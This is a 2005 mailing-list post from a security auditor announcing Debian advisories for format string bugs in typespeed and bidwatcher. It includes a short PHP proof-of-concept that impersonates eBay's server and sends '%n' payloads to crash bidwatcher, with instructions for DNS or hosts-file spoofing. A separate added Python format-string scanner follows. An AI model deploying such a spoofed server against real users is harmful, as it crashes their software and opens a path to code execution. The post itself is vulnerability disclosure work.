(The Subject line is from an ad I saw in the Brussels
airport, going home from FOSDEM 2005. The Debian
QA talk at that conference mentioned us BTW:
http://people.debian.org/~jeroen/fosdem2005qa.html/img8.html )
Lately I've finished auditing some stuff I had lying around
half-audited for a while. This resulted in the publication of
DSA-684-1 - a combined format string bug and buffer overflow of
the malloc()+sprintf() kind in typespeed - and DSA-687-1 - a format
string bug in bidwatcher that requires hacking someone's DNS server
or doing a man-in-the-middle attack.
Here is my crash exploit for bidwatcher, BTW (save it as
eBayISAPI.dll):
<?php
# fake-ebay - shows a format string bug in bidwatcher
# Ulf Harnhammar, February 2005
#
# Instructions:
# ------------
#
# You install this script in a directory called /aw-cgi from the web root.
# You also configure the web server so .dll runs PHP scripts. Then you
# fiddle with the DNS server or with /etc/hosts, so your server is
# cgi.ebay.com and cgi3.ebay.com. As soon as any user starts bidwatcher, they
# get hit by the format string bug.
$query = $_SERVER['QUERY_STRING'];
if ($query == 'TimeShow')
{
header('Location: http://cgi3.ebay.com/aw-cgi/eBayISAPI.dll?AdultLoginShow');
exit;
}
if (preg_match('/^MfcISAPICommand=AdultLogin&/', $query))
echo "%n%n%n%n\n";
?>
I also found a whole bunch of vulnerabilities in unace (bug
#296839). Additionally I ran my Perl script for finding format
string bugs over the source of all setuid/gid software in Debian
and found some non-security-related format string bugs in icebreaker
(#297644) and trackballs (#297646).
// Ulf Härnhammar
Received on Fri Mar 04 2005 - 16:35:31 GMT
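The post mentions a Perl script for finding format string bugs in setuid/gid sources. As an added example (my own Python sketch, not Ulf's script), here is the core check such a scan performs: flag printf-family calls whose format argument is not a string literal. The function table and the C fragment are constructed for the demo, not code from bidwatcher or typespeed.

```python
import re

# Constructed table: printf-style function -> index of its format argument.
FORMAT_FUNCS = {"printf": 0, "fprintf": 1, "sprintf": 1, "snprintf": 2,
                "syslog": 1, "err": 1, "errx": 1, "warn": 0, "warnx": 0}
CALL_RE = re.compile(r"\b(" + "|".join(FORMAT_FUNCS) + r")\s*\(")

# Constructed C fragment for the demo; not code from bidwatcher or typespeed.
SAMPLE_C = '''\
char *msg = read_line(sock);         /* attacker-controlled */
printf(msg);                         /* bad: data used as the format */
printf("%s", msg);                   /* ok */
fprintf(stderr, msg);                /* bad */
snprintf(buf, sizeof buf, "%d", n);  /* ok */
syslog(LOG_INFO, msg);               /* bad */
'''

def split_args(text):
    # Split a C argument list at top-level commas, stopping at the closing ')';
    # tracks nested parentheses and string literals (including \" escapes).
    args, cur, depth, in_str, i = [], "", 0, False, 0
    while i < len(text):
        c = text[i]
        if in_str:
            cur += c
            if c == "\\" and i + 1 < len(text):
                cur += text[i + 1]; i += 1
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True; cur += c
        elif c == "(":
            depth += 1; cur += c
        elif c == ")":
            if depth == 0:
                args.append(cur.strip()); return args
            depth -= 1; cur += c
        elif c == "," and depth == 0:
            args.append(cur.strip()); cur = ""
        else:
            cur += c
        i += 1
    return args  # unterminated call: return what was collected

def find_format_string_risks(source):
    # Returns (line, function, format_arg) for each call whose format is not a literal.
    findings = []
    for m in CALL_RE.finditer(source):
        func, args = m.group(1), split_args(source[m.end():])
        if (pos := FORMAT_FUNCS[func]) < len(args) and not args[pos].startswith('"'):
            findings.append((source.count("\n", 0, m.start()) + 1, func, args[pos]))
    return findings
```

Running find_format_string_risks(SAMPLE_C) reports lines 2, 4 and 6; a real scan still needs a human to decide whether the non-literal format can carry untrusted data, as it did in bidwatcher.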